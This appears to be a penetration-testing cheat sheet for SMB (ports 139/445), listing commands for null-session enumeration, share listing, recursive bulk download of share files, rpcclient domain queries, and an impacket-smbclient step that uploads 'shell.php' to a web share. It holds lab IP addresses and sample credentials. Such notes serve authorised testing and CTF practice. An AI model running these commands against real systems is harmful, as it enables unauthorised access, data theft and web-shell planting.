Port 139/445 - SMB
Enumeration
enum4linux -a -l 10.10.10.143
enum4linux-ng.py -A -C -v 10.10.10.143
nmap --script "safe or smb-enum-*" -p 445 10.10.10.143
nmap -v --script=smb-enum* -p T:139,445 10.10.10.143
nmap -v --script=smb-vuln* -p T:139,445 10.10.10.143
List Shares
# Check if you have any access
crackmapexec smb $RHOST
crackmapexec smb $RHOST --shares
crackmapexec smb $RHOST -u '' -p ''
crackmapexec smb $RHOST -u '' -p '' --shares
crackmapexec smb $RHOST -u 'anyuser' -p '' --shares
# List share
smbmap -H $RHOST -P 445 2>&1
smbmap -u null -p "" -H $RHOST -P 445 2>&1
# Access to the share
smbclient //$RHOST/share/ -N -L
# No password and login
smbclient '\\\\$RHOST\profiles$' -N
# if password available
smbclient '\\\\$RHOST\\forensic' -U audit2020
# For older SMB protocol
smbclient -N //10.10.10.3/tmp --option='client min protocol=NT1'
# Impacket-smbclient
impacket-smbclient craft2/thecybergeek:winniethepooh@192.168.218.188
shares
use WebApp
put shell.php
# get all files and sort it
mkdir download; cd download
smbget -R smb://$RHOST/share/
find . -type f -exec du -h {} + | sort -h
# Recursive via oneliner
smbclient '\\\\$RHOST\\forensic' -U audit2020 -c 'mask "";prompt OFF;recurse ON; mget *'
# Recursive via manual command
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
# Another recursive
smbget -U r.thompson -R smb://$RHOST/data/IT
# Read all files
for file in $(find . -type f); do echo ">> $file <<" && cat $file; done # Include .(dot)file and recursive
for i in *; do echo ">> $i <<" && cat $i; done # No .(dot) file and not recursive
Samba rpcclient
rpcclient -U "" -N 10.10.10.143 # -U:Username -N:No-pass
rpcclient -U "usernmae" 10.10.10.143
password:"password"
rpcclient $> enumdomusers
rpcclient $> enumprinters
rpcclient $> enum
rpcclient $> querydominfo
Last updated